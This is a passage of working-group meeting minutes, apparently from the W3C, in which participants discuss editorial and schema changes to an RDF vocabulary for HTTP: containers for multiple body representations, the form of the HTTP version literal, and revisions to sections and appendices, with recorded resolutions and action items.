... use cases need further elaboration
... It looks like there is lots of implicit information there
... Think there was another use case somewhere
... JK could you look for that?
JK: will try to
SAZ: Now section 2.2.1 body property
... we could use several representations for the same content
... how to bind them here?
CV: could we use rdf:Alt
SAZ: it implies order
... three alternatives
... Sequence implies a sort of numerical order
... Alt is something like a default and other alternatives
... Bag is a generic container
... in same cases the default may be relevant, in others not
JK: in case something is XML you can use three
alternatives with XMLContent as the default then TextContent and finally
base64
... if its not XML but is still text you can have a TextContent default and then a base 64
... if it's not even text then use base64
SAZ: think we need two things here
... an example of using the body property after its description
... after the example there should be a note or something with clarification of representing content in several ways and an example
... think we should be flexible
... the author should decide the kind of container
... just say you should use a container and maybe do a proposal
... don't think all this have any impact on the schema
... does this sound ok?
JK: looks good
CV: ok
CI: +1
JK: should we say don't use multiple bodies properties?
CV: what if I just have one option?
JK: then you don't need any container
... at most one body property
CV: if it's base64 content don't need container, just use body property
JK: if it's XML Content but you just want one
representation the use also just body property, don't need any container
... that doesn't work
... you need a Bag or any other container
... I think this is not proper RDF
SAZ: you need parsetype collection
JK: this is a different thing
... is like a closed list
... containers are open
SAZ: we agree on having a section that shows how to do multiple representations of a body with an example
RESOLUTION: include a section that shows how to do multiple body representations with an example
JK: a question about httpVersion
... what's the literal?
... just the version number or include http?
<JohannesK> "1.1" versus "HTTP 1.1"
JK: maybe clarify in the description
... just add the version number
SAZ: "Property representing the HTTP version number as a Literal."
<shadi> ACTION: SAZ improve working of the abstract section [recorded in]
<shadi> ACTION: JK send SAZ updated HTML for section 2.2.1 [recorded in]
CV: now just two possiblities 1.0 and 1.1
... fix that on the schema?
SAZ: don't think is a good idea
CI: nor do I
<shadi> ACTION: SAZ clarify that HTTP version is only the numerical value (digit.digit format) [recorded in]
SAZ: now at section 3
MS: what does "other specifications" mean?
... regarding "RCF 2616 or other specifications"
JK: the section don't define new terms
CV: the first paragraph is confusing
SAZ: we pick some values from other places than RCF 2616 and should mention them
JK: should say they are not mentioned in the document just in the RDF file
SAZ: but the RDF file is part of the spec
... can't separate them
<shadi> ACTION: SAZ clarify the first paragraph of section 3 (to note the separation between the document contents and the RDF files, but also to clarify that other RFCs are used) [recorded in]
<shadi> ACTION: SAZ collapse sub-section in section 3 [recorded in]
<shadi> ACTION: JK send SAZ the HTML for appendix A [recorded in]
SAZ: also subsection not necessary in Appendix
A
... just one paragraph again at Appendix B
... move it to the introduction
<shadi> ACTION: SAZ move limitations to the introduction section as a note [recorded in]
JK: the range for the body property should be open, not Content
SAZ: think also we should take out the range
<shadi> ACTION: SAZ remove range from the body property (in appendix C and schema files) [recorded in]
SAZ: not sure if Appendix E and F are out of
date
... need to have a look at it
<shadi> ACTION: JK send SAZ updates to appendix E [recorded in]
<shadi> ACTION: SAZ clean up appendix E and F [recorded in]
SAZ: not avalaible next week
... do not know when I can meet
... can meet next week
... see you all nex week
!quit | http://www.w3.org/2008/05/21-er-minutes | CC-MAIN-2016-44 | refinedweb | 861 | 74.29 |
On Mon, 2009-01-19 at 14:50 -0800, Matthias Wessendorf wrote:
> hi,
>
> looking at the tomcat comet module [1] and comparing it to the one in
> jetty/dojo [2],
> I wonder if the package (api-part) in tomcat shouldn't be named
> "org.cometd" (-> [3]).
>
> Another question is, is the tomcat module up-to-date? Since I see some diffs on
> the classes etc? (-> API)
>
> Are there some thoughts of a more common module for this? Like working
> on the API
> with Jetty/dojo and just *reuse* the API, here in Tomcat and just care
> about the actual
> IMPL ?
This has been discussed one month ago. To summarize, this stuff is not a
standard, so something in the org.apache namespace was used.
BTW, this Tomcat cometd API is also available in JBoss AS 5, so that
should mean good production deployment availability (eventually).
Rémy
---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscribe@tomcat.apache.org
For additional commands, e-mail: dev-help@tomcat.apache.org | http://mail-archives.apache.org/mod_mbox/tomcat-dev/200901.mbox/%3C1232408196.3041.16.camel@localhost.localdomain%3E | CC-MAIN-2015-11 | refinedweb | 165 | 66.64 |
Handling Unicode Strings in Python
Table of Contents
- Text Representation in Python
- Converting Between Unicode Strings and Bytes
- Displaying Unicode String in REPL
- IO boundary issue
- IO boundary issue: Concrete Case Studies
- Summary
- Also Read
Created On: 2016-08-25 Updated On: 2020-01-27
I am a seasoned python developer, I have seen many UnicodeDecodeError myself, I have seen many new pythonista experience problems related to unicode strings. Actually understanding and handling text data in computer is never easy. Sometimes the programming language makes it even harder. In this post, I will try to explain everything about text and unicode handling in python.
Text Representation in Python
In python, text could be presented using unicode string or bytes. Unicode is a standard for encoding character. Unicode string is a python data structure that can store zero or more unicode characters. Unicode string is designed to store text data. On the other hand, bytes are just a serial of bytes, which could store arbitrary binary data. When you work on strings in RAM, you can probably do it with unicode string alone. Once you need to do IO, you need a binary representation of the string. Typical IO includes reading from and writing to console, files, and network sockets.
Unicode string literal, byte literal and their types are different in python 2 and python 3, as shown in the following table.
You can get python3.4's string literal behavior in python2.7 using future import:
from __future__ import unicode_literals
When you use unicode string literals that includes non-ascii characters in python source code, you need to specify a source file encoding in the beginning of the file:
#!/usr/bin/env python # coding=utf-8
This coding should match the real encoding of the text file. In linux, it's usually utf-8.
It's recommend you always put coding information there. Just config your IDE to insert the code block when you create a new python source file.
Converting Between Unicode Strings and Bytes
Unicode string can be encoded to bytes using some pre-defined encoding like UTF-8, UTF-16 etc. Bytes can be decoded to unicode string, but this may fail because not all byte sequence are valid strings in a specific encoding.
Converting between unicode and bytes is done via
encode and
decode method:
>>> u"✓ means check".encode("utf-8") b'\xe2\x9c\x93 means check' >>> u"✓ means check".encode("utf-8").decode("utf-8") '✓ means check' >>>
Bytes decoding could fail, you can choose how to handle failure using the errors parameter. The default action is to throw UnicodeDecodeError exception. If you leave it that way, you should capture the exception and handle it.
>>> help(b''.decode) Help on built-in function decode: decode(...) S.decode([encoding[,errors]]) -> object Decodes S using the codec registered for encoding. encoding defaults to the default encoding. errors may be given to set a different error handling scheme. Default is 'strict' meaning that encoding errors raise a UnicodeDecodeError. Other possible values are 'ignore' and 'replace' as well as any other name registered with codecs.register_error that is able to handle UnicodeDecodeErrors.
Displaying Unicode String in REPL
In python2, if you
join or loops.
Example code:
>>> a = [u"✓ means check", "abc"] >>> print a [u'\u2713 means check', 'abc'] >>> print u", ".join(a) ✓ means check, abc >>> for s in a: ... print s ... ✓ means check abc >>>
Only raw unicode string is
IO boundary issue
When doing IO, we need to leave the comfortable unicode string zone and deal with raw bytes, some encoding/decoding must be done at these system boundaries. This is called the IO boundary issue.
When we read from IO device, we usually get bytes. If we are actually dealing with string, we need to know the source encoding, and decode accordingly.
In pure logic code, we always deal with unicode string.
When we write to IO device, we need to specify an encoding and convert unicode string to bytes.
For beginners, it's recommended you always write all logic code to handle unicode string and do explicit encode/decode at IO boundaries. When dealing with strings, the pure logic code should accept unicode string as input and return unicode string as output. Some libraries may support doing the encode and decode for you. You should read the library manual and pay attention when using them. These can save you some typing. Under the hood, it still does the encoding and decoding at boundaries.
For experienced programmers, sometimes you may prefer to skip some encoding/decoding for performance. When this is the case, document the types that you expect and return in function docstring.
IO boundary issue: Concrete Case Studies
Handling File IO
Read text file in python2, you should decode line to get unicode string, encode line before writing to a file.
Example:") as fout: with open(src, "r") as fin: for line in fin: fout.write(process_line(line.decode("utf-8")).encode("utf-8"))
The same code in python3:", encoding="utf-8") as fout: with open(src, "r", encoding="utf-8") as fin: for line in fin: fout.write(process_line(line))
In python3,
open function supports encoding keyword parameter,
decoding/encoding can happen under the hood automatically. You can just work
with unicode string.
On the other hand, if you do not use the encoding parameter. You should do explicit encoding/decoding as in python2.
Handling Database IO
Reading data from database is similar to reading from file. Decode when reading, process it, encode when writing. However, some python database libraries do this for you automatically. sqlite3, MySQLdb, psycopg2 all allow you to pass unicode string directly to INSERT or SELECT statement. When you specify the string encoding when creating connection, the returned string is also decoded to unicode string automatically.
Here is a psycopg2 example:
#!/usr/bin/env python # coding=utf-8 """ postgres database read/write example """ import psycopg2 def get_conn(): return psycopg2.connect(host="localhost", database="t1", user="t1", password="fNfwREMqO69TB9YqE+/OzF5/k+s=") def write(): with get_conn() as conn: cur = conn.cursor() cur.execute(u"""\ CREATE TABLE IF NOT EXISTS t1 (id integer, data text); """) cur.execute(u"""\ DELETE FROM t1 """) cur.execute(u"""\ INSERT INTO t1 VALUES (%s, %s) """, (1, u"✓")) def read(): with get_conn() as conn: cur = conn.cursor() cur.execute(u"""\ SELECT id, data FROM t1 """) for row in cur: data = row[1].decode('utf-8') print(type(data), data) def main(): write() read() if __name__ == '__main__': main()
Read more in Psycopg2 Unicode Handling.
Handling HTTP request and response
When sending HTTP request, data should be encoded according to HTTP standards. The most easy way to encode data is using the requests library.
When reading HTTP response, data should be decoded according to response content-type and content encoding. Sometimes HTML body text's encoding can't be inferred and decode may fail. If you are working with text in HTML, you should handle these cases. For example, you could choose to ignore them or log the error.
Here are examples of using the requests library:
#!/usr/bin/env python # coding=utf-8 """ sending HTTP requests using requests library """ import json import requests def test_get_response(): r = requests.get("") assert type(r.content) is bytes # r.content is response body in raw bytes assert type(r.text) is unicode # r.text is decoded response body def test_encode_data_for_get(): r = requests.get("", {"state": "closed"}, # get request data is encoded using query parameter headers={"Accept": "application/vnd.github.v3+json"}) for issue in r.json(): assert type(issue['title']) is unicode def test_encode_data_for_post_form_urlencoded(): """visit to see how the request looks like. """ r = requests.post("", {"keyword": u"日光灯", "limit": 20}) # post data is encoded using application/x-www-form-urlencoded assert r.status_code == 200 def test_encode_data_for_post_raw(): """visit to see how the request looks like. """ data = json.dumps({"keyword": u"日光灯", "limit": 20}) assert type(data) is bytes r = requests.post("", data) # raw body is also supported assert r.status_code == 200
Logging
Python's logging module is complex to config. But I won't talk about its configuration here. When you want to log some text, you should just use unicode string. Let logging handle the encoding conversions.
If you only have bytes, decode it to unicode string before passing to logger function. Otherwise, the program may crash because python will try decode using ascii codec by default.
Example code:
#!/usr/bin/env python # coding=utf-8 """ logging text data """ import logging logging.basicConfig(format='%(levelname)-8s %(message)s', level=logging.DEBUG) logger = logging.getLogger(__name__) def reverse(line): logger.debug(u"reverse line: %s", line) return line[::-1] def main(): print(reverse(u"✓ correct")) if __name__ == '__main__': main()
Handling String in JSON encoding and decoding
When encoding python object to JSON, keep using unicode string. When decoding JSON string to python object, you will get unicode string.
#!/usr/bin/env python # coding=utf-8 """ json encode/decode example """ from __future__ import unicode_literals import json def test_main(): o = {"correct": "✓", "incorrect": "❌"} assert json.dumps(o) r = json.loads(json.dumps(o)) assert "correct" in r assert type(r["correct"]) is unicode if __name__ == '__main__': test_main()
When a python object is encoded to JSON, non-ascii character will be encoded
as
\uxxxx. This is just one valid syntax for JSON's string data type and can
provide better cross platform/language compatibility.
If you don't want to see the
\uxxxx in result JSON string. You may use
ensure_ascii=False parameter of
json.dumps, this will return a unicode
json string.
#!/usr/bin/env python # coding=utf-8 """ json encode/decode example """ from __future__ import unicode_literals import json def test_json_unicode(): o = {"correct": "✓", "incorrect": "❌"} json_string = json.dumps(o, ensure_ascii=False) assert type(json_string) is unicode r = json.loads(json.dumps(o)) assert "correct" in r assert type(r["correct"]) is unicode
Handling Strings When Using Redis
In Redis, string values can contain arbitrary binary data, for instance you can store a jpeg image. When you store text as string in redis, and retrieve it, you will get a bytes object. If you want to get unicode string back, use decode_responses=True when creating a redis connection/instance.
Also, in Redis, there is no integer, double or boolean type. These are stored as string value. When you store a number in a redis key, what you get back is a string, either bytes or unicode. As seen in the example:
#!/usr/bin/env python # coding=utf-8 """redis example in python2 """ import redis def test_redis(): conn = redis.StrictRedis(host='localhost', port=6379, db=0) conn.set(u'somestring', u'✓ correct') assert type(conn.get(u'somestring')) is str assert conn.get(u'somestring') == b'✓ correct' # non string types conn.set(u'someint', 123) assert type(conn.get(u'someint')) is str assert conn.get(u'someint') == b'123' conn.set(u'somedouble', 123.1) assert type(conn.get(u'somedouble')) is str assert conn.get(u'somedouble') == b'123.1' conn.set(u'somebool', True) # don't do this. assert type(conn.get(u'somebool')) is str assert conn.get(u'somebool') == b'True' conn.hset(u"somehash", "key1", '✓ correct') conn.hset(u"somehash", "key2", '❌ wrong') d = conn.hgetall(u"somehash") assert "key1" in d assert u'key1' in d assert type(d['key1']) is bytes assert d['key1'] == u'✓ correct'.encode('utf-8') assert d['key1'] != u'✓ correct' def test_redis_auto_decode(): conn = redis.StrictRedis(host='localhost', port=6379, db=0, decode_responses=True) conn.set(u'somestring', u'✓ correct') assert type(conn.get(u'somestring')) is unicode assert conn.get(u'somestring') == u'✓ correct' # non string types conn.set(u'someint', 123) assert type(conn.get(u'someint')) is unicode assert conn.get(u'someint') == u'123' conn.set(u'somedouble', 123.1) assert type(conn.get(u'somedouble')) is unicode assert conn.get(u'somedouble') == u'123.1' conn.hset(u"somehash", "key1", '✓ correct') conn.hset(u"somehash", "key2", '❌ wrong') d = conn.hgetall(u"somehash") assert "key1" in d assert u'key1' in d assert type(d['key1']) is unicode assert d['key1'] == u'✓ correct' assert d['key1'] != u'✓ correct'.encode('utf-8')
Things get a little nasty in python3. In python3, redis keys and values are strictly bytes. This is especially tricky when dealing with hashes.
#!/usr/bin/env python3 # coding=utf-8 """redis example in python3 """ import redis def test_redis(): conn = redis.StrictRedis(host='localhost', port=6379, db=0) conn.set('somestring', '✓ correct') assert type(conn.get('somestring')) is bytes assert conn.get('somestring') == '✓ correct'.encode('utf-8') # non string types conn.set('someint', 123) assert type(conn.get('someint')) is bytes assert conn.get('someint') == b'123' conn.set('somedouble', 123.1) assert type(conn.get('somedouble')) is bytes assert conn.get('somedouble') == b'123.1' conn.set('somebool', True) # don't do this. assert type(conn.get('somebool')) is bytes assert conn.get('somebool') == b'True' conn.hset(u"somehash", "key1", '✓ correct') conn.hset(u"somehash", "key2", '❌ wrong') d = conn.hgetall(u"somehash") assert "key1" not in d assert b'key1' in d assert type(d[b'key1']) is bytes assert d[b'key1'] == '✓ correct'.encode('utf-8') def test_redis_auto_decode(): conn = redis.StrictRedis(host='localhost', port=6379, db=0, decode_responses=True) conn.set('somestring', '✓ correct') assert type(conn.get('somestring')) is str assert conn.get('somestring') == '✓ correct' # non string types conn.set('someint', 123) assert type(conn.get('someint')) is str assert conn.get('someint') == '123' conn.set('somedouble', 123.1) assert type(conn.get('somedouble')) is str assert conn.get('somedouble') == '123.1' conn.hset("somehash", "key1", '✓ correct') conn.hset("somehash", "key2", '❌ wrong') d = conn.hgetall("somehash") assert "key1" in d assert b'key1' not in d assert type(d['key1']) is str assert d['key1'] == u'✓ correct'
Handling Text in PyQt
In PyQt, you should use unicode string or QString. PyQt will accept both (and more). When reading data from other resource, convert them to unicode string or QString first.
Running Python in Apache2 mod_wsgi
Apache2 use C locale by default, which can cause lots of problems in python
program that deals with non-ascii text. To change that, you need to update
/etc/apache2/envvars to set proper LANG.
## Uncomment the following line to use the system default locale instead: . /etc/default/locale export LANG
Then restart apache2.
Running Python in upstart, systemd
Programs started by upstart or systemd is a direct children of PID 1. Usually many environment variables and resource limit setting is not effective. It can cause mysterious problem at run time. I recommend you set at least the following options in upstart or systemd.
Upstart:
env LANG=en_US.UTF-8 env PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin limit nofile 65535 65535
Systemd:
[Service] Environment="LANG=en_US.UTF-8" Environment="PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" LimitNOFILE=65535
LANG variable will affect string encoding and decoding. Max number of open files often affects servers with lots of connections or file descriptors.
Running Python in Docker
When run python program in docker container, in Dockerfile, you should add
ENV LANG "C.UTF-8" ENV LC_ALL "C.UTF-8"
If this is not set, on most base images, default system locale will be C. Unicode decode could fail. You may not be able to print unicode string in console.
Summary
Writing software that handles unicode is great. Seeing UnicodeDecodeError is awful. Seeing software or library that other people wrote throw UnicodeDecodeError can be frustrating. Get it correct from day one if you care about i18n and l10n.
This post is supposed to help you understand unicode in python, both the basic information and the practical use cases. If you know a very different use case or trap that is not covered above, please leave a comment so this article could be improved.
Also Read
There is another great post about unicode in python3 that I recommend. Pragmatic Unicode from Ned Batchelder in 2012. | https://blog.emacsos.com/unicode-in-python.html | CC-MAIN-2020-50 | refinedweb | 2,654 | 52.36 |
If you have written some Python code and used the for loop, you have already used iterators behind the scene but you probably didn’t know about it. Iterators are objects that we can iterate over one by one. They are practically everywhere in a Python codebase. Understanding the concepts of iterators and how they work can help us write better, more efficient code from time to time. In this post, we will discuss iterators and other related concepts.
How does iteration work?
Before we can dive into iterators, we first need to understand how iteration works in Python. When we do the
for loop, how does Python fetch one item at a time? How does this process work?
There are two functions that come into play –
iter and
next. The
iter function gets an iterator from an object. It actually calls the
__iter__ special method on the object to get the iterator. So if an object wants to allow iteration, it has to implement the
__iter__ method. Once it gets the iterator object, it continues to call
next on the iterator. The
next function in turn calls the
__next__ method on the iterator object. Let’s see a quick example:
>>> l = [1, 2, 3] >>> i = iter(l) >>> type(l) <class 'list'> >>> type(i) <class 'list_iterator'> >>> next(i) 1 >>> next(i) 2 >>> next(i) 3 >>> next(i) Traceback (most recent call last): File "<stdin>", line 1, in <module> StopIteration >>>
Let’s see. We first create a list named
l with 3 elements. We then call
iter() on it. The type of
l is
list but look at the type of
i – it’s
list_iterator – interesting! Now we keep calling
next on
i and it keeps giving us the values we saw in the list, one by one, until there’s a
StopIteration exception.
Here the list is an iterable because we can get an iterator from it to iterate over the list. The
list_iterator object we got is an iterator, it’s an object that we can actually iterate over. When we loop over a list, this is what happens:
l = [1, 2, 3] iterator = iter(l) while True: try: item = next(iterator) print(item) except StopIteration: break
Makes sens? The for loop actually gets the iterator and keeps looping over until a
StopIteration exception is encountered.
Iterator
The iterator is an object which implements
__next__ method so we can call
next on it repeatedly to get the items. Let’s write an iterator that keeps us giving us the next integer, without ever stopping. Let’s name it
InfiniteIterator.
class InfiniteIterator: def __init__(self): self.__int = 0 def __next__(self): self.__int += 1 return self.__int
If we keep calling
next on it, we will keep getting the integers, starting from one.
>>> inf_iter = InfiniteIterator() >>> next(inf_iter) 1 >>> next(inf_iter) 2 >>> next(inf_iter) 3 >>> next(inf_iter) 4 >>>
Iterable
What if we wanted to create an
InfiniteNumbers iterable? It would be such that when we use the for loop on it, it never stops. It keeps producing the next integer in each loop. What would we do? Well, we have an
InfiniteIterator. All we need is to define an
__iter__ method that returns a new instance of
InfiniteIterator.
class InfiniteNumbers: def __iter__(self): return InfiniteIterator() infinite_numbers = InfiniteNumbers() for x in infinite_numbers: print(x) if x > 99: break
If you remove the
break statement and the if block, you will notice, it keeps running – like forever.
Using StopIteration
Instead of breaking out from our code ourselves, we could use the
StopIteration exception in our iterator so it stops after giving us the 100 numbers.
class HundredIterator: def __init__(self): self.__int = 0 def __next__(self): if self.__int > 99: raise StopIteration self.__int += 1 return self.__int class InfiniteNumbers: def __iter__(self): return HundredIterator() one_hundred = InfiniteNumbers() for x in one_hundred: print(x)
Iterators must also implement __iter__
We saw that the
__next__ method does it’s work just fine. But we also need to implement the
__iter__ method on an iterator (just like we did in iterable). Why is this required? Let me quote from the official docs:
Iterators are required to have an
__iter__()method that returns the iterator object itself so every iterator is also iterable and may be used in most places where other iterables are accepted.
If we tried to use the for loop over our iterator, it would fail:
class HundredIterator: def __init__(self): self.__int = 0 def __next__(self): if self.__int > 99: raise StopIteration self.__int += 1 return self.__int one_hundred = HundredIterator() for x in one_hundred: print(x)
We will get the following exception:
Traceback (most recent call last): File "iter.py", line 15, in <module> for x in one_hundred: TypeError: 'HundredIterator' object is not iterable
That kind of makes sense because we saw that the for loop runs the
iter function on an object to get an iterator from it. Then calls
next on the iterator. That’s the problem, we don’t have an
__iter__ method. The official documentation suggests that every iterator should be a proper iterable too. That is, it should implement the
__iter__ method and just return an instance of itself. Let’s do that:
class HundredIterator: def __init__(self): self.__int = 0 def __iter__(self): return self def __next__(self): if self.__int > 99: raise StopIteration self.__int += 1 return self.__int one_hundred = HundredIterator() for x in one_hundred: print(x)
Now the code works fine 🙂
The Iterator Protocol
The iterator protocol defines the special methods that an object must implement to allow iteration. We can summarize the protocol in this way:
- Any object that can be iterated over needs to implement the
__iter__method which should return an iterator object. Any object that returns an iterator is an iterable.
- An iterator must implement the
__next__method which returns the next item when called. When all items are exhausted (read retrieved), it must raise the
StopIterationexception.
- An iterator must also implement the
__iter__method to behave like an iterable.
Why do we need Iterables?
In our last example, we saw that it’s possible for an object to implement a
__next__ method and an
__iter__ method that returns
self. In this way, an iterator behaves just like an iterable alright. Then why do we need Iterables? Why can’t we just keep using Iterators which refer to itself?
Let’s get back to our
HundredIterator example. Once you have iterated over the items once, try to iterate again. What happens? No numbers are output on the screen. Why? Well, because the iterator objects store “state”. Once it has reached
StopIteration, it has reached the end line. It’s now exhausted. Every time you call
iter on it, it returns the same instace (
self) which has nothing more to output.
This is why Iterables are useful. You can just return a fresh instance of an iterator every time the iterable is looped over. This is actually what many built in types like
list does.
Why is Iterators so important?
Iterators allow us to consume data each item at a time. Just imagine, if there’s a one GB file and we tried to load it all in memory, it would require huge memory. But what if we implemented an iterator that reads the file one line at a time? We could then just store that one line in memory and do necessary processing before moving on to the next item. This allow us to write really efficient programs 🙂
This all seems very confusing
If you find the concepts very confusing and hard to grasp, don’t worry. Give it a few tries, write the codes by hand and see the output. Tinker with the examples. Inspect the code, try to see what happens when you modify part of it. All things become easier when you practise more and more. Try writing your own iterables and iterators – perhaps try to clone the built in containers’ functionalities? May be write your own list implementation? Don’t worry, it will come to you in time.
8 thoughts on “Python: Iterators”
Whole time I thought, why we need iterators? 2nd paragraph from last clears everything!
Thank you 🙂
Thanks for a great tutorial. I implemented a custom list iterator to understand the concepts better as you have mentioned. Given below is my code.
# custom_list_iterator.py
class CustomList:
def __init__(self, a_list):
self.elements = a_list
def __iter__(self):
return CustomListIterator(self)
class CustomListIterator:
def __init__(self, custom_list):
self.custom_list = custom_list
self.current = 0
def __next__(self):
if self.current < len(self.custom_list.elements):
item = self.custom_list.elements[self.current]
self.current += 1
return item
else:
raise StopIteration
my_list = CustomList([1, 2, 3, 4])
for e in my_list:
print(e)
my_list = CustomList([10, 20, 30, 40])
for e in my_list:
print(e)
Sorry for the Indentation above. I copied it from my workspace directly here.
I have put the code in githu.
Nice work. But I would probably pass the list directly (instead of an instance of CustomList) to the iterator here:
return CustomListIterator(self)
🙂
Thanks for looking into my code. Looking forward for your new blog posts on Python. Your examples and the way you explain flowing from one concept into another is really nice. | http://polyglot.ninja/python-iterators/ | CC-MAIN-2018-43 | refinedweb | 1,535 | 58.28 |
Track changes to mutable data types.
Project description
Spectate
A library for Python 2 and 3 that can track changes to mutable data types.
With
spectate complicated protocols for managing updates, don't need to be the outward responsibility of a user, and can instead be done automagically in the background. For instance, syncing the state between a server and client can controlled by
spectate so user's don't have to.
Documentation
Install
- stable
pip install spectate
- pre-release
pip install spectate --pre
- master
pip install git+
- developer
git clone && cd spectate/ && pip install -e . -r requirements.txt
At A Glance
If you're using Python 3.6 and above, create a model object
from spectate import mvc l = mvc.List()
Register a view function to it that observes changes
@mvc.view(l) def printer(l, events): for e in events: print(e)
Then modify your object and watch the view function react
l.append(0) l[0] = 1 l.extend([2, 3])
{'index': 0, 'old': Undefined, 'new': 0} {'index': 0, 'old': 0, 'new': 1} {'index': 1, 'old': Undefined, 'new': 2} {'index': 2, 'old': Undefined, 'new': 3}
Project details
Release history Release notifications
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/spectate/0.4.1/ | CC-MAIN-2019-51 | refinedweb | 215 | 63.29 |
Think Python/Fruitful functions
Return values[edit]
Some of the built-in functions we have used, such as the math functions, produce results. Calling the function generates a value, which we usually assign to a variable or use as part of an expression.
e = math.exp(1.0) height = radius * math.sin(radians)
All of the functions we have written so far are void; they print something or move turtles around, but their return value is None.
In this chapter, we are (finally) going to write fruitful functions. The first example is area, which returns the area of a circle with the given radius:
def area(radius): temp = math.pi * radius**2 return temp temp often make debugging easier.
Sometimes it is useful to have multiple return statements, one in each branch of a conditional:
def absolute_value(x): if x < 0: return -x else: return x
Since these return statements are in an alternative conditional, only one will be executed.
As soon as a return statement executes,.
Exercise 1[edit]
Write a 'compare' function that returns '1' if 'x > y', '0' if 'x == y', and '-1' if 'x < y'.
Incremental development[edit], which is a floating-point value.
Already:
- Start with a working program and make small incremental changes. At any point, if there is an error, you should have a good idea where it is.
- Use temporary variables to hold intermediate values so you can display and check them.
- Once the program is working, you might want to remove some of the scaffolding or consolidate multiple statements into compound expressions, but only if it does not make the program difficult to read.
Exercise 2[edit]
Use incremental development to write a function called 'hypotenuse' that returns the length of the hypotenuse of a right triangle given the lengths of the two legs as arguments. Record each stage of the development process as you go.
Composition[edit]))
Boolean functions[edit].
Write a function
is_between(x, y, z) that
returns 'True' if 'x ≤ y ≤ z' or 'False' otherwise.
More recursion[edit] keyboard,:
- frabjuous:
- An adjective used to describe something that is frabjuous. usually is.
Here is what the stack diagram looks like for this sequence of function calls: execute.
Leap of faith[edit]
Following the flow of execution is one way to read programs, but it can quickly become labyrinthine. (yields the correct result) and then ask yourself, “Assuming that I can find the factorial of n−1, can I compute the factorial of n?” In this case, it is clear that you can, by multiplying by n.
Of course, it's a bit strange to assume that the function works correctly when you haven't finished writing it, but that's why it's called a leap of faith!
One more example[edit]
After factorial, the most common example of a recursively defined mathematical function is fibonacci, which has the following definition[1]:.
Checking types[edit]
What happens if we call factorial and give it 1.5 as an argument?
>>> factorial(1.5) RuntimeError: Maximum recursion depth exceeded
It looks like an infinite recursion. But how can that be? There[2] only defined for positive integers.' return None elif n == 0: return 1 else: return n * factorial(n-1)
The first base case handles nonintegers; the second catches negative integers. In both cases, the program prints an error message and returns None to indicate that something went wrong:
>>> factorial('fred') Factorial is only defined for integers. None >>> factorial(-2) Factorial is only defined for positive integers. None
If we get past both checks, then we know that n is a positive integer, and.
Debugging[edit]
Breaking a large program into smaller functions creates natural checkpoints for debugging. If a function is not working, there are three possibilities to consider:
- There is something wrong with the arguments the function
is getting; a precondition is violated.
- There is something wrong with the function; a postcondition
is violated.
- There is something wrong with the return value or the
way it is being used. that displays(5) :
factorial 5 factorial 4 factorial 3 factorial 2 factorial 1 factorial 0 returning 1 returning 1 returning 2 returning 6 returning 24 returning 120
If you are confused about the flow of execution, this kind of output can be helpful. It takes some time to develop effective scaffolding, but a little bit of scaffolding can save a lot of debugging.
Glossary[edit]
- temporary variable:
- A variable used to store an intermediate value in a complex calculation.
- dead code:
- Part of a program that can never be executed, often because it appears after a return statement.
- 'None':
- A special value returned by functions that have no return statement or a return statement without an argument.
- incremental development:
- A program development plan intended to avoid debugging by adding and testing only a small amount of code at a time.
- scaffolding:
- Code that is used during program development but is not part of the final version.
- guardian:
- A programming pattern that uses a conditional statement to check for and handle circumstances that might cause an error.
Exercises[edit]
Exercise 4[edit]
Draw a stack diagram for the following program. What does the program print?
def b(z): prod = a(z, z) print z, prod return prod def a(x, y): x = x + 1 return x * y def c(x, y, z): sum = x + y + z pow = b(sum)**2 return pow x = 1 y = x + 1 print c(x, y+3, x+y)
Exercise 5[edit]
The Ackermann function, 'A(m, n)' is defined[3]: | https://en.wikibooks.org/wiki/Think_Python/Fruitful_functions | CC-MAIN-2020-24 | refinedweb | 925 | 53.81 |
Thanks for the detailed code for reproducing this. The extension uses Ext element methods for calculating it's placement so I'll try to reproduce this and see what I can find by tinkering...
Sorry it's taken a few days to respond - had my laptop hard drive toast itself, so a few days building up a machine and pulling in backups of my data.. Will hopefully post a code revision in the next day or two...
Cheers! :-)
I've added 3 ifs:
Code:
afterRender: function() { Ext.ux.PasswordField.superclass.afterRender.call(this); if (this.showStrengthMeter) this.objMeter.setWidth(this.el.getWidth(false)); },
Code:
handleFocus: function(e) { if(!Ext.isOpera) { // don't touch in Opera if (this.showStrengthMeter) this.objMeter.addClass(this.pwStrengthMeterFocusCls); } }, handleBlur: function(e) { if(!Ext.isOpera) { // don't touch in Opera if (this.showStrengthMeter) this.objMeter.removeClass(this.pwStrengthMeterFocusCls); } if (this.showCapsWarning) { this.hideCapsMessage(); } },
Benny Boi,
I haven't looked at the original password strenght meter, but I found that entering 5 times 1 gives the same strength as entering $rY#2
Is this on purpose? The last one should be harder to guess/crack compared to 11111.
How about an algoritme that 'gives' points based on the type of character entered and the length of the password? These points can be used to feed the strength meter.
Just my two cents.
Maurice.
Hi Maurice...
Included in the HTML file is a sample override for the strength calculation function - it just shows that you can plug in your own function to calculate strength, and the dummy function looks at the length of the string... remove the config line from the object:
HTML Code:
pwStrengthTest: function(pw) { return (pw.length * 10); }
Hope this helps..
Cheers,
Ben
Hi Medusadelf -
Thanks for those improvements - lazy coding on my part for not putting those conditionals in to start with.. I'll integrate into the next release...
Sorry it's taken a few days to implement the next minor release of this control - had to rebuild my development environment, on top of the mayhem that is the Christmas period..
Good to see people are interested in seeing this progress - lots of extra improvements in the works at the moment.
Stay tuned over the next few days (he says optimistically!)
Cheers,
Ben
Hi,
How can I apply the guague to a textfield - similar to the other form fields:
Code:
Ext.onReady(function(){ var password = new Ext.ux.PasswordField({ width: 200, showCapsWarning: true, showStrengthMeter: true, applyto:'password', pwStrengthTest: function(pw) { return (pw.length * 10); } }); });
Sanj
perhaps you can add:
Code:
reset : function(){ if (this.showStrengthMeter) this.scoreBar.setWidth(0, true) }
Bye
I added :
Ext.reg('uxpassword', Ext.ux.PasswordField);
can now use as xtype:'uxpassword' in form configs.
Hi, very nice work!
However, it seems to have some problem when it is used in tabs. It doesnt show at all... Any help on this one ?
somewhere it should have a high z-index otherwise the caps warning can be hidden by other items) | http://www.sencha.com/forum/showthread.php?20417-2.0-Ext.ux.PasswordField-(v0.21)/page2 | CC-MAIN-2015-06 | refinedweb | 499 | 58.79 |
Eclipse java xml data binding jobs.
